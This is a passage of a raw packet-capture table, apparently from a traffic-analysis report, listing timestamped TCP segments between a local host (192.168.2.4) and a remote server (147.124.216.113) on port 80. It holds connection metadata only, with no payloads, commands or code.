                                                                                                                                                                        Jan 6, 2025 07:53:15.666838884 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.666853905 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.666853905 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.666868925 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.666892052 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.666918039 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.666989088 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667004108 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667016983 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667032003 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667058945 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.667081118 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.667699099 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667715073 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667727947 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667742014 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667752981 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.667757034 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667772055 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667779922 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.667787075 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667799950 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667813063 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.667815924 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667840958 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.667851925 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667865992 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667880058 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667889118 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.667892933 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667907953 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667917013 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.667923927 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.667948008 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.668416977 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.668431044 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.668445110 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.668458939 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.668462992 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.668477058 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.668489933 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.668500900 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.668514967 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.669343948 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669364929 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669379950 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669389009 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.669398069 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669420958 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.669457912 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669471979 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669487000 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669501066 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669501066 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.669516087 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669529915 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669543982 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669558048 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.669569969 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.669569969 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.669610977 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.684762955 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.684778929 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.684796095 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.684828997 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.684963942 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.685173035 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.685328007 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.685342073 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.685355902 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.685373068 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.685379028 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.685380936 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.685395002 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.685436964 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715094090 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715118885 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715130091 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715142012 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715152025 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715161085 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715172052 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715181112 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715190887 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715200901 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715200901 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715212107 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715221882 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715231895 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715240955 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715245962 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715254068 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715272903 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715281010 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715578079 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715590000 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715600014 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715609074 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715619087 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715625048 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715635061 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715643883 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715647936 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715660095 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715691090 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715758085 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715769053 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715779066 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715795040 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715800047 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715806961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715816975 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715822935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.715833902 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.715854883 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716114998 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716130018 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716140032 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716152906 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716155052 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716169119 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716178894 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716178894 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716191053 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716201067 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716206074 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716211081 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716219902 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716222048 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716233015 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716242075 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716250896 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716255903 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716262102 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716272116 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716279984 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716281891 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716295958 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716299057 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716306925 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716320038 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.716332912 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.716351986 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.752613068 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752628088 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752645016 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752655983 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752665997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752676010 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752679110 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.752686024 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752736092 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.752736092 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.752743959 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752756119 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.752777100 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.752990961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753007889 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753017902 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753031969 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753034115 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753046036 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753053904 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753057003 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753078938 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753127098 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753170967 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753173113 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753185034 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753206968 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753211021 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753451109 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753462076 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753472090 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753480911 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753493071 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753515005 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753799915 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753809929 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753819942 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753844023 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753859997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753865004 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753873110 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753884077 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753906012 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753916979 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753927946 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753950119 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.753957033 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753973961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.753989935 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.754151106 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754163027 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754173040 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754193068 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.754213095 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.754219055 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754229069 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754240036 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754251003 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754256010 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.754297972 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.754616976 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754626989 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754637003 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754647017 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754657030 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.754657030 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754667997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754677057 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.754678965 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754689932 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754697084 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.754729033 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.754909992 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754920006 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754930973 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.754949093 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.755086899 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755096912 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755105972 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755115986 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755129099 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.755151033 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.755192041 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755202055 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755211115 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755219936 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755225897 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.755229950 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755239010 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.755243063 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755264997 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.755599022 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755610943 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755623102 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755633116 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755641937 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.755644083 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.755661964 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.755681038 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.800436020 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800462008 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800473928 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800503016 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800508022 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.800515890 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800537109 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.800594091 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800606966 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800616980 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800631046 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.800633907 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800647020 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800653934 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.800668955 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800681114 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800683975 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.800693035 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800703049 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800714016 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.800730944 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.800911903 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800923109 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800932884 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800941944 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800951004 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.800952911 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800965071 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.800982952 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801011086 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801043034 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801053047 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801064014 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801084042 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801116943 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801129103 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801139116 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801153898 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801177025 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801219940 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801229954 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801240921 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801251888 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801260948 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801263094 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801285982 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801485062 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801521063 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801529884 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801541090 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801564932 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801601887 CET8049739147.124.216.113192.168.2.4
